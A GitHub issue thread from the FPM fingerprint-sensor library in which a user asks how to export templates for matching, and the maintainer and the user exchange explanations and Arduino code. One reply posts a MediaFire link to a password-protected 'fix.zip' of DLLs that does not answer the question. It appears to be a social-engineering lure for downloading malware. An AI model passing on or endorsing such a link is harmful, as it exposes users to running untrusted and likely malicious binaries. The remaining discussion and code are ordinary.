brianrho/FPM #56: download template fingerprint to pc

ariessetiyawan, 2024-09-29:
How to get fingerprint template so it can be used as data for fpmatch.py ​​(https://github.com/brianrho/fpmatch), can I use image_to_pc example (https://github.com/brianrho/FPM/tree/master/examples/image_to_pc)

SagarChandra07, 2024-09-29:
maybe this will help
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file

Password: changeme
I put the necessary dlls in the archive

ariessetiyawan, 2024-09-29:
> I put the necessary dlls in the archive

Can you explain in detail how to use it?

brianrho, 2024-10-01:
- You should use/modify the `templates` example to extract all the fingerprints templates you want to search (i.e. your database), into arrays -- the `template_buffer` variable holds each template after `readTemplate` has been called, and this template is also printed in your serial monitor. 

- Put all those template arrays (as a list of `bytearray`s perhaps) into a Python module, which will serve as your fingerprint database. 

- To search for a fingerprint, you need to first capture the unknown/input fingerprint for which you're looking for a match. The `enroll` example shows how you can `getImage()` and then convert that image into a template stored in one of the sensor's buffers. You can then use some of the logic in `readTemplate()` to download the template from that sensor buffer into your Arduino's RAM `template_buffer`, just like in the `templates` example. Copy this "unknown template" to your Python module.

- Finally, use `fpmatch.py` to iterate through your database and compare each template against your "unknown template" until you get a match (or not).

closed 2024-10-05 by brianrho

ariessetiyawan, 2024-10-10:
I have been able to download the fingerprint template from the example you made, but I am not clear with this explanation,

> To search for a fingerprint, you need to first capture the unknown/input fingerprint for which you're looking for a match. The enroll example shows how you can getImage() and then convert that image [...]

 but I will try to understand by trying to make the code...

brianrho, 2024-10-10:
You can just do it once i.e. call `getImage()` and then `image2Tz()` to get a template. This is your "unknown/input fingerprint" i.e. `userInput` which is to be searched for in your database `database = [correctMatch, template1, template2]`, to find a match.

ariessetiyawan, 2024-10-11:
with this code error message is "Invalid template loadModel" 

`bool search_database(int16_t fidd){
    int16_t p = -1;
    Serial.println("Waiting for valid finger");
    while (p != FPM_OK) {
        p = finger.getImage();
        switch (p) {
            case FPM_OK:
                Serial.println("Image taken");
                break;
            case FPM_NOFINGER:
                Serial.println(".");
                break;
            case FPM_PACKETRECIEVEERR:
                Serial.println("Communication error");
                break;
            default:
                Serial.println("Unknown error");
                break;
        }
        yield();
    }

    /* convert it and place in slot 1*/
    p = finger.image2Tz(1);
    switch (p) {
        case FPM_OK:
            Serial.println("Image converted");
            break;
        case FPM_IMAGEMESS:
            Serial.println("Image too messy");
            return p;
        case FPM_PACKETRECIEVEERR:
            Serial.println("Communication error");
            return p;
        default:
            Serial.println("Unknown error");
            return p;
    }

    Serial.println("Remove finger");
    p = 0;
    while (p != FPM_NOFINGER) {
        p = finger.getImage();
        yield();
    }
    Serial.println();

    /* read template into slot 2 */
    uint16_t total_read;
    p = finger.loadModel(fidd,2);
    switch (p) {
        case FPM_OK:
            {
              //total_read = search_template(fidd, template_buffer, BUFF_SZ);
              Serial.print("Template "); Serial.print(fidd); Serial.println(" loaded.");
              break;
            }
        case FPM_PACKETRECIEVEERR:
            Serial.println("Communication error");
            return p;
        case FPM_DBREADFAIL:
            Serial.println("Invalid template loadModel");
            return p;
        default:
            Serial.print("Unknown error "); Serial.println(p);
            return p;
    }

     // OK success!

    p = finger.downloadModel();
    switch (p) {
        case FPM_OK:
            break;
        default:
            Serial.print("Unknown error: "); Serial.println(p);
            return 0; 
    }

    bool read_finished;
    int16_t count = 0;
    uint16_t readlen = BUFF_SZ;
    uint16_t pos = 0;

    while (true) {
        bool ret = finger.readRaw(FPM_OUTPUT_TO_BUFFER, buffer + pos, &read_finished, &readlen);
        if (ret) {
            count++;
            pos += readlen;
            readlen = BUFF_SZ - pos;
            if (read_finished)
                break;
        }
        else {
            Serial.print("Error receiving packet ");
            Serial.println(count);
            return 0;
        }
        yield();
    }
    
    uint16_t total_bytes = count * FPM::packet_lengths[params.packet_len];
    
    /* just for pretty-printing */
    uint16_t num_rows = total_bytes / 16;
    
    Serial.println("Printing template:");
    Serial.println("---------------------------------------------");
    for (int row = 0; row < num_rows; row++) {
        for (int col = 0; col < 16; col++) {
            Serial.print(buffer[row * 16 + col], HEX);
            Serial.print(" ");
        }
        Serial.println();
        yield();
    }
    Serial.println("--------------------------------------------");
    Serial.print(total_bytes); Serial.println(" bytes read.");
    return total_bytes;
}`